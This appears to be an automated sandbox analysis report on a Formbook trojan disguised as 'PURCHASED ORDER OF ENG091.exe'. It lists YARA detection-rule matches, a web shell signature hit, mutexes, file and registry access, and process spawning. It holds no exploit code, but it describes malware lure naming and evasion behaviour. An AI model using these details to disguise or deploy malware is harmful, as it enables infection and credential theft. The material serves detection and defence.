Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.2343571638.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2176143982.00000000039CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.2411207031.000000000352B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3366459232.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000036.00000002.2805551760.0000000004534000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000046.00000002.2895699701.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.2436330065.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000004E.00000002.3035230297.0000000003190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000003E.00000002.2823024000.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000003F.00000002.2884163790.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000047.00000002.3030559754.00000000045B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000025.00000002.2526649554.0000000000B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.3366396664.00000000044F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: PURCHASED ORDER OF ENG091.exe PID: 3472, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 5412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: cmstp.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 5728, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmmon32.exe PID: 4620, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif PID: 4872, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 3700, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3004, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 6540, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif PID: 3924, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 1824, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 5128, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wlanext.exe PID: 3632, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif PID: 2264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 5748, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 2704, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: chkdsk.exe PID: 6488, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: PURCHASED ORDER OF ENG091.pif.pif.pif.pif PID: 6648, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: netsh.exe PID: 5096, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@474/15@7/5

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.exe.log

Jump to behavior

Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_03

Source: PURCHASED ORDER OF ENG091.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PURCHASED ORDER OF ENG091.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Documents\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

